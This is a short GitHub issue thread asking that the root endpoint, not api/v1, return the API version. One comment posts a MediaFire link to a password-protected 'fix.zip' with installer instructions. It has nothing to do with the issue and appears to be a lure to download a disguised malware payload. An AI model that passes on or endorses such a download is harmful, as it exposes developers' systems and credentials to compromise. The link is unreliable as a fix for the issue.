### ISSUE TITLE
讓root 回傳api version

### ISSUE THREAD

**Issue by TinyMurky** [CAFECA-IO/AICH#85]
現在是 api/v1會回傳version
要改成root回傳
![image](https://github.com/user-attachments/assets/088f10fa-0fb3-4e58-8fa5-7ed1c32623a9)
![image](https://github.com/user-attachments/assets/24fedd8a-c364-4d78-818b-9bf387c3d58a)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TinyMurky** [comment]
took 1 hours
done
